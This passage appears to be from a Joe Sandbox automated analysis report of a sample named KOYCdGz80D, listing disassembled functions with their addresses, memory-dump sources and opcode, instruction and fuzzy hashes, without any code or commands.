                              • API String ID: 845504543-0
                              • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                              • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                              • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                              • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004139B6 Relevance: .4, Instructions: 355COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004135CE Relevance: .3, Instructions: 349COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004131FC Relevance: .3, Instructions: 332COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00412E5E Relevance: .3, Instructions: 326COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                              • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
                              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                              • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00824F82 Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_820000_KOYCdGz80D.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                              • Instruction ID: 4f7f8222551a0eada7fc0c3ef064c81e9248e96e1d177a4286396ea99fc8ccf3
                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                              • Instruction Fuzzy Hash: E6118E72340610AFD744DF59EC81EA673EAFB89324B298065ED04CB716DA75EC41C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F001 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID:
                              • API String ID: 1302938615-3916222277
                              • Opcode ID: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
                              • Instruction ID: 0b4e2962642302af5baa7ab99a723a4d0387960a43f5b709c9065034346dd514
                              • Opcode Fuzzy Hash: a0b30cc0040cb5fec62895a1e771348c8461d5053fe2fe274f76a2f8fb58fc86
                              • Instruction Fuzzy Hash: 09919F35900229DADB319A64CD883EAB3B4AF54314F1402FED819776D2D7B95ECACF48
                              Uniqueness

                              Uniqueness Score: -1.00%